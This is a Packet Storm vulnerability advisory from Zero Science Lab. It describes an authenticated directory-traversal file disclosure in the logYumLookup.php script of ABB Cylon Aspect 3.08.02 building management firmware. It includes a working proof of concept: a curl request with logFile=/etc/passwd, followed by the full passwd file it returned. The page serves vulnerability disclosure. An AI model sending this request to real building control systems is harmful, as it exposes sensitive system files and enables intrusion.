WHAT ARE YOU LOOKING FOR?

ABB Cylon Aspect 3.08.02 logYumLookup.php Authenticated File Disclosure ≈ Packet Storm

Exploits Affichages : 307

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

ABB Cylon Aspect 3.08.02 logYumLookup.php Authenticated File Disclosure[6]
Authored by LiquidWorm[7] | Site zeroscience.mk[8]

ABB Cylon Aspect version 3.08.02 suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the logFile GET parameter via the logYumLookup.php script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

SHA-256 | 07ab6f45ec3a9889c189eaf43ab0b85391d95b2179966c2c842437039d73a813
Download[9] | Favorite[10] | View[11]

Change Mirror[12] Download[13]


ABB Cylon Aspect 3.08.02 (logYumLookup.php) Authenticated File Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: 3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The building management system suffers from an authenticated arbitrary
file disclosure vulnerability. Input passed through the 'logFile' GET parameter
via the 'logYumLookup.php' script is not properly verified before being used
to download log files. This can be exploited to disclose the contents of arbitrary
and sensitive files via directory traversal attacks.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5849
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5849.php
21.04.2024
--
$ cat project
P   R   O   J   E   C   T
.|
| |
|'|            ._____
___    |  |            |.   |' .---"|
_    .-'   '-. |  |     .--'|  ||   | _|    |
.-'|  _.|  |    ||   '-__  |   |  |    ||      |
|' | |.    |    ||       | |   |  |    ||      |
____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
$ curl "http://192.168.73.31/logYumLookup.php?logFile=/etc/passwd" -H "Cookie: PHPSESSID=xxx"
<p></p><p>aamtech:x:500:500::/home/aamtech:/bin/sh
</p><p>mysql:x:993:65534::/var/mysql:
</p><p>ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin
</p><p>xuser:x:1000:1000::/home/xuser:
</p><p>sshd:x:995:992::/var/run/sshd:/bin/false
</p><p>avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
</p><p>avahi:x:997:994::/var/run/avahi-daemon:/bin/false
</p><p>systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway:
</p><p>messagebus:x:999:998::/var/lib/dbus:/bin/false
</p><p>nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
</p><p>gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
</p><p>irc:x:39:39:ircd:/var/run/ircd:/bin/sh
</p><p>list:x:38:38:Mailing List Manager:/var/list:/bin/sh
</p><p>backup:x:34:34:backup:/var/backups:/bin/sh
</p><p>www-data:x:33:33:www-data:/var/www:/bin/sh
</p><p>proxy:x:13:13:proxy:/bin:/bin/sh
</p><p>uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
</p><p>news:x:9:9:news:/var/spool/news:/bin/sh
</p><p>mail:x:8:8:mail:/var/mail:/bin/sh
</p><p>lp:x:7:7:lp:/var/spool/lpd:/bin/sh
</p><p>man:x:6:12:man:/var/cache/man:/bin/sh
</p><p>games:x:5:60:games:/usr/games:/bin/sh
</p><p>sync:x:4:65534:sync:/bin:/bin/sync
</p><p>sys:x:3:3:sys:/dev:/bin/sh
</p><p>bin:x:2:2:bin:/bin:/bin/sh
</p><p>daemon:x:1:1:daemon:/usr/sbin:/bin/sh
</p><p>root:x:0:0:root:/home/root:/bin/sh
</p>

Login[14] or Register[15] to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month[110]
News Tags[111]
Files by Month[112]
File Tags[113]
File Directory[114]
About Us
History & Purpose[115]
Contact Information[116]
Terms of Service[117]
Privacy Statement[118]
Copyright Information[119]
Services
Security Services[120]
Hosting By
Rokasec[121]
close
Image
Back To Top

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"

Category

Popular Sections

About